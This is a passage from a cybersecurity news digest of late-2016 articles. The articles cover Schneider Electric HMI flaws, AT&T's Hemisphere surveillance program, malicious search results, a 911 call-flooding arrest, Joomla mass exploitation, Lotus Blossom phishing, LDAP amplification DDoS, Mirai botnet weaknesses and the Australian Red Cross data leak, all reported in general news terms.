“An official familiar with the investigation declined to comment on a possible motive. The official, who was not authorized to discuss the case, noted that a large batch of unclassified personnel records were among the cache.”
Experts have downplayed the risks for the users arguing that the information was not released to unauthorized sources.It is quite frequent that employees or consultants report missing thumb drives containing sensitive data.
It is quite frequent that employees or consultants report missing thumb drives containing sensitive data.
Recently the National Security Agency went in the headlines again after a contractor was accused of having harvested high-confidential information from the Agency systems.
PanelShock 0-day Vulnerability Puts Thousands of Schneider Electric HMI Panels, Industrial Control Systems and Critical Infrastructure at Risk
1.11.2016 securityaffairs Vulnerebility
Schneider Electric flaws
Security researchers at CRITIFENCE cyber security labs publicly announced this morning (November 1, 2016) major cyber security vulnerabilities affecting one of the world’s largest manufacturers of SCADA and Industrial Control Systems, Schneider Electric. Schneider Electric flaws
The zero-day vulnerabilities dubbed PanelShock, found earlier this year by Eran Goldstein, CTO and Founder of CRITIFENCE, a leading Critical Infrastructure, SCADA and Industrial Control Systems cyber security firm. The PanelShock vulnerability was uncovered in collaboration with Check Point Software Technologies Ltd. CRITIFENCE released an advisory of the vulnerability.
“PanelShock disclose a new type of vulnerabilities in Schneider Electric’s SCADA Human Machine Interface (HMI) device panels. A low skills attacker can freeze and disconnect an HMI panel devices from the SCADA network remotely by exploiting these vulnerabilities. HMI panel devices allows operators and process engineers to monitor and control manufacture processes and field equipment, such as valves, pumps, engines, turbines, centrifuges and more.” says Eran Goldstein.
Schneider Electric are among the most common SCADA vendors in North America, Europe and worldwide. The vendor’s products are used in nearly every modern automated factory or processing plant. The vulnerabilities affects all firmware versions of Schneider Electric Magelis Advanced HMI Panel series including:
Magelis GTO Advanced Optimum panels
Magelis GTU Universal panel
Magelis STO & STU Small panels
Magelis XBT GH Advanced hand-held Panel
Magelis XBT GK Advanced Touchscreen Panels with Keyboard
Magelis XBT GT Advanced Touchscreen Panels
Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe)
PanelShock vulnerabilities, CVE-2016-8367 (SVE-82003201) and CVE-2016-8374 (SVE-82003202) disclosed improper implementation of different HTTP request methods and improper implementation of resource consumption management mechanism, in the Web Gate web service of Magelis Advanced HMI panel’s series. By exploiting the PanelShock vulnerabilities, a malicious attacker can “freeze” the panel remotely and disconnect the HMI panel device from the SCADA network and prevent the panel from communicating with PLCs and other devices, which can cause the supervisor or operator to perform wrong actions, which may further damage the factory or plant operations.
“Use of HMIs which are connecting to field installed PLCs must operate very reliable as the service engineer relies on the display for setting the operation parameters of PLCs which control the process. A security vulnerability in these devices might lead to a compound attack which can mask the view of on-site supervisors. During a malicious sabotage on the control system, the authorized and trained service person may perform a critical mistake and disruption of the control process”, says Daniel Ehrenreich, SCCE, SCADA-Cyber consultant, and trainer.
In addition, by exploiting the vulnerabilities the attacker can also trigger an unwanted behavior of the Harmony XVGU Tower Light device connected to the HMI Panel, such as starting an alarm or flashing red lights. As a result of the PanelShock attack, the target Schneider Electric Magelis GTO HMI has lost its network connectivity and requires a physical reboot to recover.
Proof of Concept (PoC) video of PanelShock Attack can be viewed here: https://youtu.be/Ehzs0mlMtbc
“Cyber security vulnerabilities commonly survive much longer in SCADA and Industrial Control Systems than in typical IT Networks”, says Eran Goldstein, CTO and Founder of CRITIFENCE. “In most scenarios SCADA and ICS hardware installed on client’s facilities are used as part of a production environment. In many cases, the hardware is installed in harsh environments and hard to reach places. This results in a much lower physical availability than any other network device. In addition, since these devices are in a production environment, disabling the device for a software update could cause much larger scale complications. Another important reason is that managers of such plants and facilities do not like tampering with devices if it’s working without any issues, as the saying goes – if it works, don’t touch it. So in many occasions, security managers would rather isolate the SCADA and ICS networks, and hardening the networks leading to that environment, than tampering with the actual devices”.
Following a disclosure, Schneider Electric have confirmed that the Magelis HMI Series products are vulnerable to the findings presented by CRITIFENCE and released an Important Security Bulletin (SEVD-2016-302-01) Once acknowledged the existence of the vulnerability, CRITIFENCE with a support from ICS-CERT (Department of Homeland Security, DHS) worked in collaboration with Schneider Electric to mitigate and remediate the vulnerabilities in order to create a security updates for all Schneider Electric Magelis Advanced HMI Panel series. ICS-CERT released an Advisory and Alert for PanelShock vulnerabilities. Schneider Electric are already working on a software update for the affected types of HMI panels.
For more information: Important Security Bulletin (SEVD-2016-302-01)
The major issue of a remediation process in Critical Infrastructure, SCADA systems, and OT Networks is not just to create the specific security patch or firmware update that will mitigate a cyber security zero-day vulnerability. “Fixing a vulnerable SCADA equipment such HMI or PLC require installing a software patch in most cases or in some situations even to reinstall the firmware on the affected hardware. This process might cause downtime of the system and require coordination of few teams/factors as well with a scheduled maintenance windows which are hardly allowed in SCADA systems” says Alexey Baltacov, Advisory Board Member at CRITIFENCE.
As part of the disclosure CRITIFENCE Critical Infrastructure and SCADA/ICS Cyber Threats Research Group have released a free tool to active check specifically for PanelShock vulnerabilities – CRITIFENCE PanelShockVCT (Vulnerability Check Tool) that can be downloaded here: http://www.critifence.com/vct/panel_shock
“The vast majority of SCADA and ICS devices are based on legacy hardware components, so many devices succumb to vulnerabilities that could be handled easily by more robust hardware. Feeble CPU’s, low memory hardware and outdated operating systems are not uncommon in the field of SCADA and ICS. Yet not many security researchers have access to this kind of devices. While anyone at home can download a web server software and try to find vulnerabilities, not that many people overall have access to a PLC which is not part of a production environment. The elevated security of many common network components is partly a result of the vendors’ work, and partly a result of self-assigned security researchers that find vulnerabilities. Since there’s a low exposure to SCADA and ICS devices to security researchers, the security level relies exclusively on vendors’ efforts”. Says Eyal Benderski, Manager of the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group at CRITIFENCE.
About the Authors
schneider-electric-hmi-3-jpgCRITIFENCE is a leading Critical Infrastructure, SCADA and Industrial Control Systems cyber security firm.
The company developed and provides SCADAGate+ unique passive cyber security technology and solutions designed for Critical Infrastructure, SCADA and Industrial Control Systems visibility and vulnerability assessment, which allow to monitor, control and to analyze OT network cyber security events and vulnerabilities easily and entirely passively. CRITIFENCE development team and Critical Infrastructure and SCADA/ICS Cyber Threats Research Group combined from top experienced SCADA and cyber security experts and researchers of the IDF’s Technology & Intelligence Unit 8200 (Israel’s NSA).
For more information about CRITIFENCE refer to: http://www.critifence.com
Mass Surveillance of Cell Phone Data by AT&T Service Provider
31.10.2016 securityaffairs Incindent
AT&T has been data-mining and willingly sharing user phone data, through its “Hemisphere” Project, which is essentially a mass surveillance program.
The NSA may be the well-known governmental entity notorious for conducting spy surveillance of its citizens and its massive record retention program, but the private sector is also capitalizing on such opportunities. AT&T, a telecommunications conglomerate with diversified revenues of more than $146 billion reported in 2015, is branching out by selling its “Hemisphere” services to the US Justice Department. AT&T has been data-mining and willingly sharing user phone data, through its “Hemisphere” Project, which is essentially a mass surveillance program. The Hemisphere program, first whispered about as early as 2013, reportedly utilizes data provided by the cell phone company dating back to the 1980s.
AT&T has not commented publically on the program, but reported documents published highlight the fact that the telephone company is providing the service through its already established infrastructure. All at the cost of additional fees to the buyer, of course.
AT&T has collected and retained, in the past, phone call logs and other “Metadata” with of extensive 380 million user database. Research conducted by the NSA revealed that telephone metadata can reveal sensitive personal information of the user. Collected meta-data consists of non-content phone user information, which can pose a threat to user privacy.
att-mass-surveillance-hamisphere-project
Image: The logo of the “Hemisphere Project” (AT&T)
Verizon Communications has also been the subject of a forced compliance order issued by the U.S. Foreign Intelligence Surveillance Court that resulted in handing over electronic data to the NSA. This data included all calling records maintained on a daily basis- without disclosure to the user. The order itself covered location, frequency, and duration of the calls, but not the actual content of the communication. Additionally, the user is not aware of any such privacy invasions nor may be the subject of any criminal investigations.
Previously, the NSA might have been the only entity that had the resources to support such surveillance with the infrastructure to house such extensive data. AT&T’s access to its hundreds of millions of customer, however, gave the telecommunications company ample opportunity and infrastructure to collect data on everything that happens within its network. The communication of two or more users in regards to “who”, “what”, “when”, and “where” are collected and stored. This data, accessed through AT&T’s vast user network, along with the location data provided by cell phones, leaves a distinct digital trail that law enforcement should be able to follow. We’re talking about a massive amount of information, especially considering AT&T’s market share and reach. AT&T’s landline customers alone consist of more than 75% of the entire market share.
Documents revealed confirm a link between the collections of phone data to the formation of an “alliance” with law enforcement agencies, who are eager for such information provided by AT&T’s vast network. The revenue received by AT&T for such a service, although morally or ethically ambiguous in nature, amounts to millions per year.
AT&T’s willingness to data-mine information is one unique characteristic of this alliance. Usually, a private entity provides such information under the enforcement of a legal warrant. AT&T itself seeking an alliance (a sort of public-private partnership) with a governmental agency, is a rather different type of partnership.
Cell phone providers, in the past, have hardly played such a cooperative role, and certainly not such a prosperous one. FBI’s battle with Apple regarding the San Bernardino shooter’s iPhone indicated that Apple publically opposed such an alliance. It refused to cooperate with investigators in order to create software that would unlock the shooter’s iPhone. Apple believed that creating, in essence a backdoor to unlock its software, would set a dangerous precedent. Apple ultimately propagated against the invasion of cell phone privacy by refusing to cooperate with investigators in a terrorism case. AT&T has no such reservations.
Formerly, the US-NSA has had legal authority to access phone user information under the USA Patriot Act of 2001. Some of the same powers granted to the USA Patriot Act are now available under the USA Freedom bill (2016), but with some restrictive guidelines. The NSA is also facing several lawsuits filed by the American Civil Liberties Union (ACLU) over its controversial bulk collection of phone data. Several rulings have vilified the ACLU’s claim on the basis that:
“While others who have brought legal challenges to the bulk collection program, plaintiffs [in this case] lack direct evidence that records involving their calls have actually been collected.”
AT&T’s stand on these published documents is in opposition to Snowden’s views on the matter.
att-mass-surveillance-2
[IMAGE] Edward Snowden’s on the cover of Time in 2013.
Edward Snowden, in an interview with European reporters on Oct. 26th 2016, further fueled the massive public debate on mass surveillance by cell phone service providers. Snowden claimed that the public is not able to stop targeted surveillance from huge government organizational programs. According to him, this was the reason behind the massive data breaches and cyber-attacks that have taken place in recent years:
“In our current state of the art, offense is easier than defense. This is an unfortunate artifact of the fact that governments around the world have prioritized offensive capabilities for the benefit of spying on people so much more strongly than they have defensive capabilities, preventing our countries from being hacked”.
In the continuing saga of Edward Snowden, his comments on the cooperation of AT&T with governmental agencies suggest that governmental agencies are focusing most of their resources on the offensive-end, leaving them vulnerable to defend against massive data breaches and hacks. Because of a lacking in defense, vulnerabilities can be exploited, as evidenced by the cyber-attack at the Office of Personnel Management, the recent Democratic National Committee hacks, and other such infrastructural attacks. These could have been prevented with a focus on bolstering defense:
“[Its] fear of the power grid being attacked—these were preventable problems”- Edward Snowden
If such cyber-attacks can compromise the security of private and governmental agencies, then what is the defense against such a compromise in critical sectors, such as energy or manufacturing? Previous Reports, published in 2015, have in fact stated that the energy sector in the U.S. is not prepared to defend itself against cyber threats.
Snowden’s reasoning isn’t incorrect as he makes a justifiable argument. Moreover, his narrative has consistently warned of mass surveillance activities taking place without the knowledge of the mass public. He has sacrificed his entire career on reporting breaches of user privacy by intelligence agencies. The former NSA contractor is a whistle-blower, he exposed the questionable practices of his employer, a governmental agency, but he is also an advocate of safeguarding user privacy at the hands of surveillance agencies.
You may ask, “If AT&T volunteers user phone information- is it still illegal?” The answer lies somewhere in the middle. In essence, this is capitalism at its finest, an exchange between buyer and seller that constitutes a business transaction. The information at the heart of this debate is legitimized at the source and wrapped around an added financial incentive. However, the threat of user privacy against mass surveillance is a very real one, and not just in the U.S
AV-TEST study sees search engine results even more poisoned with malicious links
31.10.2016 securityaffairs Safety
According to a study published by the independent anti-virus testing outfit AV-TEST, the number of malicious search engine results has been increasing.
The vast majority of the Internet users blindly trust data provided in response to their queries to the search engines. Actually, search engine results are increasingly poisoned with malicious links, the experts noticed a significant increase of the phenomena compared to the past.
It has been estimated that poisoned search engine results are displayed almost six times this year compared to 2013.
The threat is serious, Google and other search engines even more frequent provides malicious links in search results that lead to compromised websites used by crooks to deliver malware.
According to a study published by the independent anti-virus testing outfit AV-TEST, the number of malicious search engine results has been increasing year by year since 2013. The data are worrisome if we consider that across the year the defensive solutions have been more sophisticated.
The study analyzed search engine results in various queries from Google, Bing, Yandex and Faroo. The experts also analyzed over the past two years more than 515 million Twitter updates including malicious links.
“Search engines such as Google and others provide access to roughly more than 1 billion websites and globally handle 4 to 6 billion search queries – daily.” reads the study. “AV-TEST analyzed 80 million websites and discovered an unsettling trend.
“the number of infected results has been increasing year by year since 2013, despite the fact that search engine operators use many tools and technologies to try to filter them out.”
Experts at AV-TEST.org examined 80 million websites, identifying 18,280 infected web pages, while in the year up to August the organization inspected 81 million websites spotting more than 29,632 infected web pages.
It is important to remark that the search engine results were recorded by disabling the Google Safe Browsing feature.
“Both evaluations from AV-TEST through the year 2015 up until August 2016 ultimately yield two important final results (without Google safe browsing)” reads the study.
2015, 80 million websites examined: 18,280 infected web pages
2016 (up to Aug.), 81 million websites examined: 29,632 infected web pages
search engine results study
Both figures are disconcerting is compared with search engine results obtained in a past study dated 2013.
“By comparison: already in 2013, among roughly 40 million web pages examined, 5,060 malware threats were found. You don’t need to be a mathematician to see this clear growth trend.” continues the study.
The researchers performed also a sort of counter-test visiting the pages with malware threats found by AV-TEST, with the Google Safe Browsing tools. They reported the following results:
2015: 18,280 pages with malware threats, 555 Google warnings
2016: 29,632 pages with malware threats, 1,337 Google warnings
Maik Morgenstern, chief technology officer at AV-TEST.org, explained that discrepancy in the number of threats for search engine results due to the dynamic content of the web pages. It means that tools see something different everytime they access the site due to dynamic content such as malicious ads.
“It could be the ads on the website that have been flagged as suspicious by us and that changes every time you access the site,” said Morgenstern. “Or the website is delivering different content randomly or it does so by checking the user agent or location of the user.
“Also I do not know what the interval is that Google/Bing are scanning the sites for malware. There will always be a certain timeframe where malicious content could be on the site without Google/Bing knowing it, even if they were able to detect it. It is also possible that we flagged content as suspicious that is not considered suspicious by Google/Bing.”
Crooks earned at least $1.35m with spamming campaigns
31.10.2016 securityaffairs Spam
Authorities identified a man in Florida that powered spamming campaigns abusing an army of corporate servers and private email accounts.
Spam is still a profitable business for crooks and to give you an idea of how the cyber criminals work let share with you the story of the leader of a spamming gang.
Timothy Livingston (31), from Fort Lauderdale, Florida, used an army of corporate servers and private email accounts to send out spam messages. He has pled guilty to charges of computer hacking and identity theft, the man with two other accomplices was running A Whole Lot of Nothing (AWLN), LLC.
The company was used as a front for illegal activities of suspects, it earned hundreds of thousands of dollars between January 2012 and June 2015 by powering spamming campaigns for illicit drugs.
According to court documents, Livingston was charging advertisers between $5 and $9 for every spam email that resulted in a sale of an illegal product.
“Defendant TIMOTHY LIVINGSTON, a/k/a “Mark Loyd,” resided in or around Fort Lauderdale, Florida, and was the sole owner ofA Whole Lot of Nothing LLC (“AWLN”), a company that sent unsolicited emails in bulk (or “spam”) on behalf of its customers for a fee. Defendant LIVINGSTON was the organizer and leader of the computer hacking and illegal spamming schemes described herein.” reads the court documents.
Livingston confirmed to have hired the developer Tomasz Chmielarz (33) to write spamming code used in the campaign evading spam filters. Chmielarz, in reality, made much more, he also hacked into corporate servers and use them to power spamming campaigns.
“Defendant TOMASZ CHMIELARZ resided in or around Clifton, New Jersey, and was a computer programmer. Among other things, defendant CHMIELARZ authored the hacking tools and other programs used to facilitate the computer hacking and illegal spamming schemes described herein.” continues the court documents.
When law enforcement arrested Livingston found more than 50 million email addresses in a database used for spamming campaigns.
In the story, there is also a third person, Devin James McArthur, who worked for Comcast and contributed to the peopling of the spam archive with more than 24.5 million email addresses from his company.
McArthur collaborated with other two crooks to collect more data from other companies. that have pled guilty to the scam in June.
According to the Department of Justice (DoJ), Livingston has agreed to return illicit funds earned by his company in spamming campaigns.
“In connection with his plea agreement, Livingston consented to the entry of a forfeiture money judgment in the amount of $1,346,442, as well as the forfeiture of property obtained using illegal proceeds from the scheme, including a 2009 Cadillac Escalade and a 2006 Ferrari F430 Spider.” reported the DoJ.
Among the goods confiscated to Livingston, there are a 2009 Cadillac Escalade and a 2006 Ferrari F430 Spider.
Do you still think that spam is not very profitable?
Young hacker arrested for disrupting 911 Service with a TDoS attack
31.10.2016 securityaffairs Crime
An 18-year-old man from Arizona, Meetkumar Hiteshbhai Desai, was arrested this week because he is suspected for the severe disruption of 911 service.
A few weeks ago, a group of researchers from Ben-Gurion University of the Negev’s Cyber-Security Research Center demonstrated how it is possible to significantly disrupt the US’ 911 emergency call system.
An attacker could use a botnet of compromised mobile devices located throughout the country to knock the 911 service offline in an entire state for entire days.
Another possibility for the attackers is to thousands of smartphones that could be used to power a massive TDoS attack.
Such kind of attacks could be very dangerous for the population, due to the interruption of a public service.
News of the day is that an 18-year-old man from Arizona, Meetkumar Hiteshbhai Desai, was arrested this week because he is suspected for the severe disruption of 911 service.
The youngster used one of his iOS exploits to compromise mobile devices to gain full control of them.
“Surprise PD had believed that the calls were coming from smart phones and tablets. A link through Twitter was believed to be the cause of people’s phones dialing 911 over and over and not allowing them to hang up. Cyber Crimes Detectives found a Twitter account with about 12,000 followers which encouraged followers to click on the link to see the latest post” reads a press release from the Cyber Crimes Unit of Maricopa County Sheriff’s Office.
“This webpage domain was hosted out of San Francisco, California and ultimately sheriff’s detectives were able to shut it down to stop the potential immediate threat to the 911 emergency systems which could have possibly been compromised if enough users had clicked on the link.”
After being notified of disruption to the 911 service in the Phoenix area, the police immediately launched an investigation monitoring Meet online activity. Law enforcement discovered the way he powered the attack against the 911 service.
When Meet was arrested, he explained to Sheriff’s detectives that he was trying to find out bugs and malware that could be used to hack into Apple smartphone. He was interested in the bug bounty program of the company.
Desai explained he was uploading a script that simply displayed pop-ups and caused iOS devices to reboot, but he mistakenly published the link to force iOS devices to dial 911 service and hang up continually.
Desai created several exploits for the flaw he found, then he shared a link to one of his JavaScript exploits on his Twitter account and other websites.
Mobile users clicking on the link triggered the exploit and their mobile devices started calling the 911 service non-stop, in this way the 911 call center was flooded with more than 100 hang-up calls is a few minutes earlier this week.
Desai risks fifteen years in prison, five years per Class 2 Felony count.
Massive hacking campaign on Joomla sites via recently patched flaws
31.10.2016 securityaffairs Vulnerebility
Experts from the firm Sucuri observed a spike in the number of attacks in less than 24 hours after Joomla released patches for two critical flaws.
On October 25, Joomla released the version 3.6.4 to fix two high severity vulnerabilities, CVE-2016-8870, and CVE-2016-8869.
The first flaw, tracked as CVE-2016-8870, could be exploited by attackers to create user accounts even if account registration is disabled, while the second flaw, tracked as CVE-2016-8869, can be exploited by users to register on a website, but with elevated privileges.
A combination of these flaws can be exploited to upload a backdoor and gain complete control of vulnerable Joomla websites.
Every time a flaw is public disclosed it is a race between website administrators and hackers that scan the web for vulnerable Joomla versions.
It is quite easy to locate vulnerable versions exposed online, for this reason, experts from security firm Sucuri monitored the attacks attempts on the vulnerable Joomla version in the wild.
Data collected by Sucuri are eloquent, the number of attacks drastically increased shortly after the patches were released by Joomla. The experts observed several attacks launched within 24 hours against some of the most popular Joomla websites.
The researchers discovered a first mass hacking campaign originated from three IP addresses in Romania, the hackers attempted to create an account with the username “db_cfg” and the password “fsugmze3” on thousands of Joomla sites. Below the three IPaddresses used by the attackers.
82.76.195.141
82.77.15.204
81.196.107.174
Sucuri also detected another IP address from Latvia used to attack the Joomla websites.
“They were the ones doing this initial mass exploitation campaign. Shortly after, another IP address from Latvia started a similar mass exploit campaign trying to register random usernames and passwords on thousands of Joomla sites.” reads the analysis published by Sucuri.
Obviously, the number of attacks increased in a significant way after the experts started sharing exploits.
“After these initial mass exploits, multiple researchers and security professionals started to share different exploits for this attack. Some of them are even automating the upload of backdoors and using some unique techniques to bypass the media uploader (using .pht files).” continues Sucuriti.
“That led to a massive increase in IP addresses trying to exploit this vulnerability using different patterns and techniques.”
On October 28,the number of infections peaked 27,751, of course, the figure is likely to be greater.
It is important to apply the updates to Joomla websites to secure them, administrators urge to check their logs for activity from the IP addresses shared by the experts at Sucuri. Be careful to the creation of suspicious admin accounts.
Lotus Blossom Chinese cyberspies leverage on fake Conference Invites in the last campaign
31.10.2016 securityaffairs Cyber
The Chinese APT Lotus Blossom is trying to lure victims with fake invitations to Palo Alto Networks’ upcoming Cybersecurity Summit.
The Chinese APT Lotus Blossom, also known as Elise and Esile, is behind a new cyber espionage campaign that is trying to lure victims with fake invitations to Palo Alto Networks’ upcoming Cybersecurity Summit.
With this social engineering trick the attackers are trying to trick users into installing a strain of malware that could be used to spy on victims’ machines.
Security experts that analyzed the activity of the Lotus Blossom APT believe it is nation state actor that has been around since at least 2012.
In June 2015, Trend Micro published a report on a targeted attack campaign of the group that hit organizations in various countries in the Southeast Asian region. The experts speculated the involvement of state-sponsored hackers due to the nature of the stolen information.
“The Esile targeted attack campaign targeting various countries in the Southeast Asian region has been discussed in the media recently. This campaign – which was referred to by other researchers as Lotus Blossom – is believed to be the work of a nation-state actor due to the nature of the stolen information, which is more valuable to countries than either private companies or cybercriminals.” wrote Trend Micro.
According to Trend Micro, other researchers have collected evidence that dates back to 2007 first activities of the group.
Back to the present, the Lotus Blossom group launched a new espionage campaign using fake invitations to Palo Alto Networks’ Cybersecurity Summit that will be held in Jakarta, on November 3.
“Actors related to the Operation Lotus Blossom campaign continue their attack campaigns in the Asia Pacific region. It appears that these threat actors have begun using Palo Alto Networks upcoming Cyber Security Summit hosted on November 3, 2016 in Jakarta, Indonesia as a lure to compromise targeted individuals.” states the blog post published by Palo Alto Networks. “The payload installed in attacks using this lure is a variant of the Emissary Trojan that we have analyzed in the past, which has direct links to threat actors associated with Operation Lotus Blossom.”
The security experts from Palo Alto Networks observed that cyberspies used the trick to deliver a new version of the Emissary Trojan.
The hackers powered a spear phishing campaign leveraging on emails with Word document attachments titled “[FREE INVITATIONS] CyberSecurity Summit.doc.” The document, which contains an image from a previous invitation, attempts to exploit the old Microsoft Office vulnerability tracked as CVE-2012-0158 to deliver the malicious payload.
“As our readers and customers in Indonesia are likely recipients of this phishing e-mail, we want to release some key facts to clarify the situation.
The malicious email will have an attachment named “[FREE INVITATIONS] CyberSecurity Summit.doc” that if opened will exploit CVE-2012-0158. The legitimate invitation emails from Palo Alto Networks did not carry any attachments.
In response to this incident, we have halted our email invitations, so please disregard all new emails related to invitations to this conference, as it may be malicious.
Individuals wishing to attend the conference should register on our official CYBERSECURITY SUMMIT – JAKARTA website.”
Palo Alto Networks has opted to stop sending out email invitations due to the ongoing spear phishing campaign and is inviting users in Indonesia to ignore any message receive these days regarding the event.
The image was obtained from a screenshot of an older invitation that was properly edited. The researchers managed to revert the images to before they were cropped to extract information on the system used by the attackers.
“The information in the screenshot and an analysis of the document’s timestamp suggested that the user was located in China.” continues the report.
“The threat actor is running Windows localized for Chinese users, which suggests the actor’s primary language is Chinese. The ‘CH’ icon in the Windows tray shows that the built-in Windows input method editor (IME) is currently set to Chinese,” researchers explained. “Also, the screenshot shows a popular application in China called Sogou Pinyin, which is an IME that allows a user to type Chinese characters using Pinyin. Pinyin is critical to be able to type Chinese characters using a standard Latin alphabet keyboard, further suggesting the threat actor speaks Chinese.”
Teenage Hacker Arrested For Disrupting 911 Service With DDoS Attack
30.10.2016 thehackernews Attack
Just last month, researchers explained how an attacker can knock the 911 service offline in an entire state by launching automated Distributed Denial of Service (DDoS) attacks using a botnet of just 6000 smartphones.
But, doing so, in reality, could not only land public in danger but the attacker as well.
The same happened to an 18-year-old teen from Arizona, who was arrested this week following a severe disruption of 911 emergency systems caused due to one of his iOS exploits.
Meetkumar Hiteshbhai Desai discovered an iOS vulnerability that could be exploited to manipulate devices, including trigger pop-ups, open email, and abuse phone features, according to a press release from the Cyber Crimes Unit of Maricopa County Sheriff's Office.
In order to prove the flaw, Desai allegedly created several exploits and posted a link to one of his JavaScript exploits on his Twitter account and other websites.
People accessing the exploit link from their iPhones and iPads were forced to call 911 non-stop, which flooded a 911 call center with more than 100 hang-up calls within a "matter of minutes" earlier this week.
After being notified of disruption to the 911 service around the Phoenix, Arizona, area, investigators immediately launched an investigation and traced the Twitter link back to a web page registered to 'Meet Desai.'
The authorities identified Desai as the possible suspect behind the attack against the 911 service and took him into custody late Wednesday.
On his part, Desai claimed he just meant to upload a script that simply displayed pop-ups and caused iOS devices to reboot, but he mistakenly published a link to an exploit that caused iOS devices to dial 911 and hang up continually.
According to authorities, Desai shared the critical iOS exploit on Twitter with over 12,000 followers, out of which over 1,849 clicked on that link.
Maricopa officers arrested Desai, took him to jail and booked him on three counts of felony computer tampering charges, on Monday, October 24.
LDAP as attack vector could power Terabit-Scale LDAP DDoS Attacks
30.10.2016 securityaffairs Attack
Security experts observed attackers launching a powerful LDAP DDoS, the new amplification method could peak Terabit-Scale attacks.
LDAP DDoS attacks are the novelty in the threat landscape, the Lightweight Directory Access Protocol (LDAP) protocol could be abused to power massive DDoS attacks.
The LDAP is an open standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network.
The experts at the DDoS mitigation provider Corero Network Security confirmed that an LDAP DDoS attack has been already observed in a live incident. The attack leverages on a CLDAP zero-day vulnerability, a similar attack has been observed last week, and experts believe that could become another option in the arsenal of hackers in the wild.
Abusing the LDAP protocol it is possible to obtain an amplification factor of 46x, that in specific conditions could peak at 55x.
The experts from Corero explained that the attacker could send a query from a spoofed address (the victim address) to a vulnerable reflector supporting the Connectionless LDAP service (CLDAP).
The CLDAP service, then sends the response to the spoofed address, of course, the size of the response is much larger than the original query.
“In this case, the attacker sends a simple query to a vulnerable reflector supporting the Connectionless LDAP service (CLDAP) and using address spoofing makes it appear to originate from the intended victim. The CLDAP service responds to the spoofed address, sending unwanted network traffic to the attacker’s intended target.” reads a blog post published by Corero.
“Amplification techniques allow bad actors to intensify the size of their attacks, because the responses generated by the LDAP servers are much larger than the attacker’s queries. In this case, the LDAP service responses are capable of reaching very high bandwidth and we have seen an average amplification factor of 46x and a peak of 55x.”
LDAP DDoS attacks could cause serious damage, experts confirmed that they can peak at tens of terabits per second in volume of traffic.
“When combined with other methods, particularly IoT botnets, we could soon see attacks reaching previously unimaginable scale, with far-reaching impact. Terabit scale attacks could soon become a common reality and could significantly impact the availability of the Internet– at least degrading it in certain regions,” said Dave Larson, CTO/COO at Corero Network Security, explains.
Hacking back the Mirai botnet, technical and legal issues
30.10.2016 securityaffairs BotNet
Security researchers have found vulnerabilities in the source code of the Mirai botnet and devised a method to hack back it.
The Mirai botnet, this name is familiar to security experts due to the massive DDoS attack that it powered against the Dyn DNS service a few days ago.
The Mirai malware was first spotted by the researcher MalwareMustDie that confirmed it was designed to hack into poorly configured and vulnerable IoT devices. Its source code was leaked on the popular criminal hacker forum Hackforum by a user with moniker “Anna-senpai” giving the opportunity to anyone to compile and customize its own version of the threat.
Experts who reviewed the code have discovered a weakness that could be exploited to shut down the botnet stopping it from flooding the targets with HTTP requests, this means that it is possible to hack back the threat. The experts from Invincea discovered three vulnerabilities in the Mirai code, one of them, a stack buffer overflow, could be exploited to halt the DDoS attack powered by the botnet. The buffer overflow vulnerability affects the way Mirai parses responses from HTTP packets.
“Perhaps the most significant finding is a stack buffer overflow vulnerability in the HTTP flood attack code. When exploited it will cause a segmentation fault (i.e. SIGSEV) to occur, crash the process, and therefore terminate the attack from that bot. The vulnerable code has to do with how Mirai processes the HTTP location header that may be part of the HTTP response sent from an HTTP flood request.” reported the analysis published by the security firm Invincea.
The researchers highlighted that their attack would not have helped in the DNS-based DDoS attack against provider Dyn, but it would halt the Layer 7 attack capabilities of the Mirai botnet implemented in the coded leaked online.
The researchers at Invincea successfully tested a proof-of-concept exploit in a virtual environment setting up a debug instance of the Mirai bot, a command and control server and a target machine.
“This simple “exploit” is an example of active defense against an IoT botnet that could be used by any DDoS mitigation service to defend against a Mirai-based HTTP flood attack in real-time. While it can’t be used to remove the bot from the IoT device, it can be used to halt the attack originating from that particular device. Unfortunately, it’s specific to the HTTP flood attack, so it would not help mitigate the recent DNS-based DDoS attack that rendered many websites inaccessible.” explained the Scott Tenaglia, Research Director in the cyber capabilities team at Invincea Labs.
Tenaglia remarked that the method proposed by the company doesn’t clean the compromised devices, instead it could be effective against HTTP flooding powered by the Mirai Botnet.
The method proposed by the researchers is a form of active defense that has important legal implications because anyway, who is defending its system from the attack power a response attack against the attacker’s infrastructure.
Hacking back is illegal under the Computer Fraud and Abuse Act.
Hacking a bot means to make an unauthorized access to a computer system and such kind of operations have to be authorized by a court order.
Invincea has made an excellent work and isn’t suggesting the hacking back, but limited its analysis on the technical aspect of the Mirai botnet and its vulnerabilities.
“It’s in the gray space of active defense,” Tenaglia told to ThreatPost. “In the defense world, this is a hotly contested issue. Say if your IoT is already compromised and bad code is already running, if I do something to the bad guy’s code, am I breaking law?”
“I would never comment on the legality of this,” Tenaglia said. “I think this gives us another point to discuss with regard to active defense. Is this something we think is ok? I don’t think it would hurt the system; it might help it. If a bot is degrading performance of the Internet connection because of the packets it’s sending out, and if this attack kills the process and the connection gets better, have we helped you? That’s why this is a gray area.”
Red Cross Blood Service incident. The Australian largest ever leak of Personal data
30.10.2016 securityaffairs Incindent
The Australian Red Cross Blood Service confirmed the data leak that exposed a backup database containing the personal details of donors.
This data leak is considered by security experts one of the most severe due to the nature of the target, the Australian Red Cross Blood Service. The sensitive database was discovered on October 24 by a security expert that was scanning the Web for exposed web servers.
One of its third-party service providers inadvertently exposed a backup database containing the personal details of 550,000 individuals.
The database remained accessible online between September 5 and October 25.
The man who discovered the database reported his discovery to the popular security expert Troy Hunt who runs the data breach notification service haveibeenpwned.com.
The 1.74Gb database contains 1.3 million records containing the name of donors, gender, date of birth, country of birth, physical and email addresses, phone number, blood type, type of donation, donation dates, and eligibility answers.
“In the Red Cross’ case, the data that was ultimately leaked was a database backup. That 1.74GB was simply a mysqldump file that had everything in it. Taking a database backup is not unusual (in fact it’s pretty essential for disaster recovery), it’s what happened next that was the problem.” wrote Troy Hunt in a blog post.
“The database backup was published to a publicly facing website. This is really the heart of the problem because no way, no how should that ever happen. There is no good reason to place database backups on a website, let alone a publicly facing one. There are many bad reasons (usually related to convenience), but no good ones.”
Hunt reported the issue to the Red Cross and the ausCERT, meanwhile, the Australian Red Cross Blood Service reported the incident to the Australian Cyber Security Centre, Federal Police and the Office of the Information Commissioner.
